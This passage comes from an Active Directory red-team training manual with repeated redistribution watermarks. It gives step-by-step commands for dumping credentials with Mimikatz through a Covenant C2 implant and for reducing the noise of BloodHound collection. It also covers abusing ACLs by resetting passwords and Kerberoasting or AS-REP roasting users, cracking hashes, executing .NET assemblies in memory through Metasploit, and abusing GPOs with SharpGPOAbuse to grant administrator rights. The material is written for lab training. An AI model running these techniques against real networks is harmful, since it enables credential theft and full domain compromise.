language version 7.1 or greater".

● Second thing is that you need at least Visual

Studio 2019. It is due to msbuild version,
for SharpHound3, 16.0 is required and VS2017
uses versions 15.x

Let's move SharpHound.exe to our Kali attacker

machine. Then, go to the Grunt and choose Task ->
Assembly, and fill it as per below screenshot:

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Remember that you need to run in a High integrity

context!

After executing the task, you should be able to

view its output at the "Taskings" tab:

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Copy the file name from the log. It will be

needed in the Download task immediately after you
retrieve the Bloodhound output:

Next, go to "Data" and "Downloads". You can now

download the file and transfer it to the machine
where BloodHound is installed.

Before we move on with that file, let's take look

at a tab named "Credentials". Let's try to obtain
some credentials to be able to see them in that
place. Remember to run in high integrity!

Go to the Grunt, Task, and choose Mimikatz (with

the default command)

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

You should be able to get the output in Taskings:

Instead of copying it, simply go back to "Data"

and choose tab "Credentials".

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

You can observe that the gathered credentials are

present in there.

Back to the BloodHound log, download the .zip

archive and move it to Windows Bloodhound machine
you have set up (with neo4j and java). As
Bloodhound is started, you can simply drag & drop
the .zip archive onto it. After a short while you
could be able to work on the data. Click on the
menu icon on the top left of the screen to be
able to issue queries:

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Click on "Queries". There you can make use of

some pre-built BloodHound functionalities to
analyze the collected information.

Let's choose "Find shortest Paths to Domain

Admins"

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

As the current user has administrative rights on

the DC, it can directly become a DA too, which
can be seen on the graph.

If you click on the icon representing an object

on the graph (e.g. on the victim user icon), you
will be able to see detailed information about it
in the "Node info" pane:

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Using Bloodhound
We've already showed you how to setup bloodhound.
Just to summarize, bloodhound allows to visualize
domain member objects on graphs, which is

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

achieved by its Ingestor module (that you run on

a remote PC with some domain credentials to
collect information about that domain) and a
Neo4j module which allows to generate the graphs
based on collected information.

Bloodhound Ingestors

Ingestors are simply bloodhound modules designed

to collect data from remote systems. Two publicly
available builds are constantly being published
on GitHub repository
https://github.com/BloodHoundAD/BloodHound/tree/m
aster/Ingestors

You can find both .NET and PowerShell versions

there. In our lab, we used the .NET version of
Sharphound (which is a bloodhound ingestor) to
collect data from the lab domain.

Bloodhound Collection methods

When uploading the ingestor module, we used the

default collection method which performs the
following enumeration steps:

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

● Default Enumeration

● ACL Enumeration

● ObjectProps Enumeration

● Container Enumeration

If you want to specify detailed collection

methods, you can use a command line argument
similar to the below

Invoke-BloodHound -CollectionMethod
ACL,ObjectProps

Which will narrow the collection methods only to

ACLs and Object properties.

Apart from choosing what method we want to use to

collect data, you should also be aware that some
monitoring solutions might be in place. Thus, you
might want to operate with less noise when
collecting bloodhound data.

You can change the frequency of the requests sent

by BloodHound by using command line switches such
as

Invoke-BloodHound -Throttle 1500 -Jitter 10

Throttle is the value of pause between subsequent

requests and Jitter is the variance in %.

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Another method to increase the stealthiness of

theBloodHound ingestor is to minimize its disk
footprint. This can be achieved using the below
command line switches:

-CompressData -RemoveCSV and -NoSaveCache

As the data is collected into a .zip file, you

can download it from remote machine and drag&drop
on to your Bloodhound local instance to load it
into underlying neo4j database.

Bloodhound interface

As soon as new data is loaded into the database,

you can explore the panel in the left top corner
to interact with it. In the rest of the screen
you will see a graph which is a result of the
last executed query.

The database info contains general statistics

about the database you loaded from the .zip file.
If you try to open the .zip, you can notice that

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

it simply contains multiple json files with

information collected by the bloodhound ingestor.

You can also clear the database in order to load

new one.

If you click on a node on the graph, you will be

able to display node info which is the second tab
of the menu. For example, we clicked on the
"Analyst1" user node and now various statistics
are available under the "node info" menu.

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

In that menu, you can click on any number. For

example, let's click on "Reachable high value
targets"

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

You will see new graph where the current node is

a starting point. In that case, you can now view
all objects that are considered "high value"

If you right click on a node, you can edit its

properties

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

For example, you can mark it as high value one.

The last tab is for queries, which includes some

prebuilt visualizations that might be useful in
your domain exploration. Note, that if you set a
certain node as a "starting node", then you will
be able to see those graphs from its perspective.

However, the prebuilt queries offer only

visualization of small portion of the domain
data, so you might want to build your own
queries.

Bloodhound custom queries

In order to create non-standard queries, you can

click on the pencil icon at "Custom Queries"

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Customqueries.json will appear in your default

system editor for json files. In our case it is
visual studio but you can use any editor you
like. Keep in mind that it will be more helpful
if it has syntax highlighting.

https://github.com/SadProcessor/Cheats/blob/maste
r/DogWhispererV2.md

A Bloodhound query matches (like SQL SELECT) some

nodes, and that match can be als be subject to
conditions. After a match is made, a result
should be returned. On the graph you will see
only the returned items.

For example:

MATCH (n) RETURN n

Will return all nodes.

Let's add one query to the json file

"name":"CUSTOM",

"queryList":[

"final":true,

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

"query":"MATCH (n:User) RETURN n"

If you want to add more queries, separate them

with a comma. We now save the file and click on
the refresh button at the "Custom Queries"
section. A query named "CUSTOM" will show up.

This how you select multiple objects, however,

they are not grouped on a graph now.

Consider the following query which lists all

domain admins:

"name":"CUSTOM",

"queryList":[

"final":true,

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

"query":"MATCH (n:Group) WHERE n.name =~

\"(?i).*DOMAIN ADMINS.*\" WITH n MATCH
(n)<-[r:MemberOf*1..]-(m) RETURN n,r,m"

Here we match object n that is a Group type and

its name matches the above regular expression -
contains string "domain admins". Moreover, we
would like another condition to be matched and
visualized - an object that is a member of that
group. As there are three objects included in the
visualization (the group, the fact of being its
member and the member itself), all of them have
to be returned from query. The result is:

The bloodhound “magic” happens in the graph

definition. The language of graphs is named
Cypher and its most interesting part is the
dependency visualization which looks like below:

(This)-[IsConnectedTo]->(That)

Consider following query:

MATCH (u:User)

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

MATCH (g:Group {name:

ADMINISTRATORS@ELS-CHILD.ELS.LOCAL})

MATCH (u)-[MemberOf]->(g)

RETURN u

Here we first ask for all users and store in

variable U, then for a group called
"ADMINISTRATORS@DOMAIN.LOCAL" and we store in
variable G. From that list of users U, we filter
who is member of the specified group G, and
finally return these User nodes.

MATCH (u:User)-[MemberOf]->(g:Group {name:

"ADMINISTRATORS@ELS-CHILD.ELS.LOCAL"})

RETURN u

Which can be incorporated into customqueries.json

as

"name":"CUSTOM",

"queryList":[

"final":true,

"query":"MATCH
(u:User)-[MemberOf]->(g:Group {name:
\"ADMINISTRATORS@ELS-CHILD.ELS.LOCAL\}) RETURN u"

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

The result may help us display all users that are

members of the administrators group.

You can also find full documentation on

BloodHound in the "Dog Whisperer's handbook"
available publicly at:

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

https://www.ernw.de/download/BloodHoundWorkshop/E
RNW_DogWhispererHandbook.pdf

Mapping GPO misconfigurations using

Sharphound
Sharphound which has already been presented can
also be a helpful tool during ACL exploitation.
Below, we are loading it using the Assembly task.

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

As per the output, we can collect the resulting

.zip file using the Download task. Later, the
file is available in the Data tab. We will
download it and upload it to the Bloodhound
instance on our local machine.

The below screenshot shows a visualization of the

query "shortest path to valuable targets"

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

There are too many objects to see it clearly, so

we can for example look for just "shortest path
to domain admins"

We can use both Bloodhound and Invoke-AclScanner

to identify potential vulnerabilities within the
domain. While Bloodhound shows us the big
picture, invoke-aclscanner shows us single
misconfigurations.

Domain ACL Exploitation

During domain reconnaissance you might encounter
a situation when you have some level of
permissions over another domain user. Most likely
this might occur when you, as a domain user, are
member of a privileged group which is in charge
of managing some part of the domain members. Of

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

course, there could be various reasons that

resulted in such a configuration.

In order to detect such configurations, you can

use PowerView. We will use an Analyst1 grunt with
a medium integrity in order to retrieve
interesting information regarding the domain.

First step will be to use the Analyst1 grunt to

import PowerView via the Task PowershellImport.

Next, we can use PowerView's utility -

Invoke-AclScanner:

powershell Invoke-AclScanner | select

ObjectDN,ActiveDirectoryRights,IdentityReference

The presented output shows that as analyst1, who

is also member of the operators group, has
GenericAll permissions on users Analyst Manager
and Analyst Manager2. Let's try to abuse that
fact.

The first, but less stealthy, option is to simply

change the password of the user we have

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

GenericAll permission to. This can be done

through a simple "net user" command:

powershell net user analystm Summer2020! /domain

ShellRunAs /shellcommand:"whoami"
/username:"analystm" /domain:"ELS-CHILD"
/password:"Summer2020!"

This allowed us to take over the account. The

second option involves cracking the user password
which is more difficult but a lot harder to
detect. Using the genericall permission we are
allowed to set a SPN for that user. We can do
this by using a simple powershell command. This
time we will do it for analystm2 which we also
control:

powershell setspn.exe -a HTTP/jumpbox

els-child\analystm2

Then, we can use Rubeus kerberoast to retrieve

the hash for kerberoasting. Note that this attack
vector will not be effective if the user has a

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

strong password as we still rely on cracking in

order to obtain the password in plaintext.

rubeus kerberoast /format:hashcat

The spn can be deleted using almost the same

command, just using the -d switch:

powershell setspn.exe -d HTTP/jumpbox

els-child\analystm2

We can supply the hash to Hashcat, as follows.

We are using a rockyou.txt which was added all

passwords already found within the lab domain.
After a while, the password is cracked.

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Exploiting Misconfigured ACLs

In case you have a GenericAll permission on a
user, you can:

● Set a SPN on behalf of that user and crack it

(stealthy method)

● Change his password and log in as that user

(not stealthy but immediate access is given)

● Force-ChangePassword privilege can also allow

you to change the password of a user

In case you have a GenericAll permission on a

Group, Write permission, Write-Owner permission
or Self permission, you can

● Add yourself to this group, and as a result

obtain the privileges that this group
possesses.

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

For example, in order to retrieve more details on

ExtendedRight, you can prepare following
PowerView query:

powershell Get-ObjectAcl -SamAccountName

service_user2 -ResolveGUIDs | ?
{$_.IdentityReference -eq "ELS-CHILD\analyst1"}

In that query we want to list all properties of

the service_user2 that analyst1 can access.

Among the outputted data you can find some less

important results like the below one.

But interesting data are also included there.

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Using the Change password permission, we can

change the service_user2 password. As usual, we
can do it using command (Use a grunt as Analyst1)

powershell net user service_account2

Password2020$ /domain

Exploitation of user attributes can also be

conducted via setting a pre-authentication
possibility for a user on which we have generic
all, write, or write attribute permission.

Note: In current exercise we will also make use

of dev-branch of PowerView, as it has extended
functionalities to manipulate user attributes
and browse ACLScanner output, which is required
in this exercise. It can be downloaded from...

https://raw.githubusercontent.com/PowerShellMafia
/PowerSploit/dev/Recon/PowerView.ps1

...and imported using the PowerShellImport task.

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

If we run the command:

powershell Get-DomainUser -PreauthNotRequired

-Verbose

We will notice in the output a user who is

asreproast-able.

Now, let's take an example of a user whose

attributes can be controlled by analyst1. The
below command will be used for such an
enumeration.

powershell Invoke-ACLScanner -ResolveGUIDs |

?{$_.IdentityReferenceName -match "Analyst1"}

We can see that one of the users we can modify is

victim.

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Now, let's set preauthentication to on by

modifying the useraccountcontrol attribute value.
Due to XOR's nature, the operation of enabling
pre-authentication is fully reversible (which
makes it stealthier) - as you can enable the
preauthentication, conduct asreproasting and then
restore the user's attributes back to original
state. We will proceed accordingly to that
scenario:

powershell Set-DomainObject -Identity analystm2

-XOR @{useraccountcontrol=4194304} -Verbose

is used to change the useraccountcontrol

attribute.

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

powershell Get-DomainUser -PreauthNotRequired

-Identity analystm2

is used to verify if the user is asreproastable

at the moment, using the command "Rubeus
asreproast"

When it is, Rubeus is used to obtain the hash. At

the end, the user attribute is restored to
original state.

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

The hash can be later cracked using hashcat,

revealing the password Spring2020!

hashcat -m 18200 asrep.txt rockyou2.txt

Using Invoke-ACLScanner along with Bloodhound

Let's then use acl scanner and try to exploit
some relationships between groups and users. From
an initial check we can see that lots of these
relationships are from user analyst1 but also
analyst3 or the group operators.

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

For example, analyst1 has a GenericAll access to

user service_user2

The same applies to user Analyst Manager

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Also, analyst3 has ExtendedRights over analyst

manager.

Analyst2 has ExtendedRight over Analyst Manager 2

etc. There are more attack paths which you can

spot by studying the output.

GPO Abuse
The ability to modify Domain Policy might result
in escalating privileges including getting Domain
Administrator-level access. During domain
reconnaissance it is important to identify
potential vulnerable GPOs. GPOs which we are
interested in are typically those, that are

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

modifiable by us. It is very likely, that upon

getting some level of access within the targeted
domain we will be able to obtain credentials
which belong to a domain user who is able to
modify a Domain Policy. We will try to identify
and exploit vulnerable GPOs in the below example.

Our starting point will be a Covenant grunt

established from Jumpbox machine in context of
the Analyst1 user.

Our first task will be to import PowerView using

the PowerShellImport task. That task has been
already presented several times. When PowerView
is imported, we can issue a Get-NetGPO command to
verify which policies are applied within our
domain.

In the current case, we can see a "test" domain

policy, also in the full output we can observe
its details:

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

For full details we can use the command:

powershell.exe Get-NetGPO | %{Get-ObjectAcl

-ResolveGUIDs -Name $_.Name}

We can observe that the Authenticated users have

permission to modify the GPO. This is a very
powerful exploit primitive which might lead to
domain compromise.

The scenarios for exploiting the GPOs rely on

pushing some instructions which will be executed

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

on objects that the policy is related to. One of

popular option is to create an "immediate task"
which will create a scheduled task under the
domain administrator context.

In order to automate the exploitation process we

will use Covenant together with SharpGPOAbuse.

https://github.com/FSecureLABS/SharpGPOAbuse

You should download the solution and compile it

as .NET version 4.0 which can be set up in
Project Application -> Target platform.

There are two files produced: SharpGPOAbuse.exe

and CommandLine.dll

In step first, we can merge together the binary

and CommandLine.dll into one file. We can do it
using the ILMerge tool. It can be installed by
going to Visual Studio -> Manage Nuget Packages
-> NuGet console -> issue command

Install-Package ilmerge -Version 3.0.29

It is later accessible in the project directory,

in our case it was

C:\(…)\SharpGPOAbuse-master\SharpGPOAbuse-master\
packages\ILMerge.3.0.29\tools\net452

Execute a command-line terminal and move both

files (SharpGPOAbuse.exe and CommandLine.dll)
into the ILMerge's directory. Then, issue the
command:

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

ILMerge.exe /out:SharpGPOAbuseMerged.exe
.\SharpGPOAbuse.exe .\CommandLine.dll

Note: also a .pdb file will be created. If you

leave that file in that directory and try to
merge another binary, ILMerge will throw an
error.

The resulting SharpGPOAbuse.exe file can be moved

to the target machine and executed - but to be
stealthier we will leverage Covenant's in-memory
assembly-loading features. So, before we move
into actually using SharpGPOAbuse, let's consider
some in-memory .NET execution scenarios.

In-memory .NET execution

Now, we will try to achieve in-memory execution
of a binary launcher using Metasploit. Before we
start, let's download and set up the related
Metasploit module

https://github.com/b4rtik/metasploit-execute-asse
mbly

In order to use it, we will need first to prepare

all components. First, we are downloading the
archive and compiling the solution as x64. For
the purpose of compilation we use Visual Studio
2017. The product of compilation is
HostingCLRx64.dll. Now as the .dll is ready, we
need to move it along with execute-assembly.rb to
our Kali machine and import it to Metasploit.

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

In order to add it as a Metasploit module, we

execute the following commands:

mkdir -p $home/.msf4/modules/post/windows/manage

mv execute-assembly.rb

$home/.msf4/modules/post/windows/manage/execute_a
ssembly.rb

cp hostingclrx64.dll
/usr/share/metasploit-framework/data/post/hosting
clrx64.dll

Note that we changed the name "execute-assembly"

to "execute_assembly". This is because Metasploit
complains about a requirement related to
alphanumeric characters.

Finally, we issue a reload_all command inside the

Metasploit framework console.

We can now make use of a new module. In order to

proceed further you need to pass the session to
Metasploit. Our meterpreter session has ID 1.

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

msf5 post(windows/manage/execute_assembly) > set

session 1

msf5 post(windows/manage/execute_assembly) > set

assembly Launcher.exe

msf5 post(windows/manage/execute_assembly) > set

arguments "-h"

msf5 post(windows/manage/execute_assembly) > set

assemblypath /root/

msf5 post(windows/manage/execute_assembly) > run

The Metasploit module allows for in-memory .NET

execution by spawning a process and injecting the
.NET assembly into it. For example, we can
download a Binary Launcher out of covenant and
set it as Launcher.exe in the assembly option:

Shortly, a new grunt is spawned.

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Such in-memory .NET execution can also be

achieved using Covenant. We have actually
practiced that already. We will combine this
capability with the tool SharpGPOAbuse.exe.
SharpGPOAbuse, in the shape we already prepared
it, unfortunately has some compatibility issues
when invoked out of Covenant. It is possible to
invoke it out from memory using the Covenant task
"assembly", however you should be prepared to
face some unexpected errors. In order to avoid
them, we will use RastaMouse's fork of that tool
which can be found below
https://github.com/ZeroPointSecurity/SharpGPOAbus
e

As per the instructions at the repository's main

page, you will need to change the source code of
the assembly as it no longer requires any command
line parameters. Open the .sln file in Visual
Studio and go to Program.cs which contains the
main function of the program. Here we will edit
some variables that reflect what command line
parameters are originally meant to set up.

static void Main(string[] args)

// CHANGE THESE

string GPOName = "test";

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

string UserAccount = "Analyst2";

And then scroll down until another //CHANGE

comment is met.

// CHANGE THIS

//StartupScript.NewStartupScript(ScriptName,
ScriptContent, DomainName, DomainController,
GPOName, DistinguishedName, "User");

LocalAdmin.NewLocalAdmin(UserAccount,
DomainName, DomainController, "test",
DistinguishedName, true);

//the last argument is the --Force

switch.

We want to change the policy "test" and in case

it was already overridden e.g. by previous
exploitation attempts, we set force argument to
true.

Then, compile the solution and move the newly

created SharpGPOAbuse.exe to the Kali machine.
Next step will be to go to a grunt on Jumpbox and
use a "Task" of name "Assembly" to load
SharpGPOAbuse.exe onto Jumpbox's grunt launcher
process.

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

After several seconds we can see that the policy

has been updated

Moreover we can see in net user's output that

Analyst2 is now a member of the Administrators
group

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

